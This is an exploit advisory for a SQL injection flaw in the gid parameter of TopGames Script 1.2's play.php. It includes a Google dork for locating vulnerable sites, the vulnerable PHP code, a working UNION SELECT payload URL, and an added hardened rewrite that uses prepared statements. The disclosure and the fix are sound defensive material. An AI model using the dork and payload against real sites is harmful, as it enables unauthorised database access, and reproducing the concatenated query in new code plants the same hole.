06/24/2013

Top Games Script 1.2 (play.php, gid param) - SQL Injection Vulnerability

TopGamesScript-v1.2 (play.php) Sql Injection Vulnerability
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://sourceforge.net/projects/gamesscript/files/latest/download?source=directory
.:. Dork           : inurl:"play.php?gid=" "Powered By TopGames.ws"
####################################################################

######################################
VULNERABILITY: CLASSIC MYSQL INJECTION
######################################

/play.php (LINE: 4-19)

-----------------------------------------------------------------------------
$gameID= $_GET['gid'];   // untrusted request parameter, used without validation

$con = mysql_connect($dbserver,$dbuser,$dbpassword);
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }

mysql_select_db($dbname, $con);

// $gameID is concatenated straight into the query text: a non-numeric
// value changes the SQL statement itself (classic MySQL injection)
$sqlselect="SELECT * FROM games WHERE gameid=" . $gameID;
$result = mysql_query($sqlselect);

$row = mysql_fetch_array($result);
$gwidth =  $row['width'];
$gheight = $row['height'];

-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

http://localhost/TopGamesScript/play.php?gid=null and 1=2 UNION SELECT
1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23


####################################################################
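A hardened rewrite of the same play.php fragment, added here as an example and not part of the original advisory or the TopGames Script distribution. It assumes the same $dbserver, $dbuser, $dbpassword and $dbname variables and the same `games` table, and uses mysqli with the mysqlnd driver (the mysql_* extension used by the vulnerable code was removed in PHP 7).

```php
<?php
// Hardened version of the play.php fragment (added example, not the
// original project's code). Assumes the same $dbserver, $dbuser,
// $dbpassword, $dbname variables and the same `games` table.

// 1. Validate the untrusted parameter before it goes anywhere near SQL.
//    gameid is a numeric key, so anything that is not a positive integer
//    (for example a string carrying "UNION SELECT") is rejected up front.
$gameID = filter_input(INPUT_GET, 'gid', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
if ($gameID === false || $gameID === null) {
    http_response_code(400);
    exit('Invalid game id');
}

// 2. Use mysqli and raise exceptions on errors instead of echoing
//    mysql_error() to the client, which leaks schema details.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
try {
    $con = new mysqli($dbserver, $dbuser, $dbpassword, $dbname);

    // 3. Prepared statement: the value is bound as an integer parameter and
    //    never concatenated into the query text, so it cannot change the
    //    structure of the statement. Select only the columns actually used.
    $stmt = $con->prepare('SELECT width, height FROM games WHERE gameid = ?');
    $stmt->bind_param('i', $gameID);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
} catch (mysqli_sql_exception $e) {
    // Log server-side for the operator; return a generic message to the user.
    error_log('play.php database error: ' . $e->getMessage());
    http_response_code(500);
    exit('Database error');
}

if ($row === null) {
    http_response_code(404);
    exit('No such game');
}
$gwidth  = $row['width'];
$gheight = $row['height'];
```

The integer validation alone would already defeat the published request, but the prepared statement is the control that holds even if the parameter is later changed to a string type.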
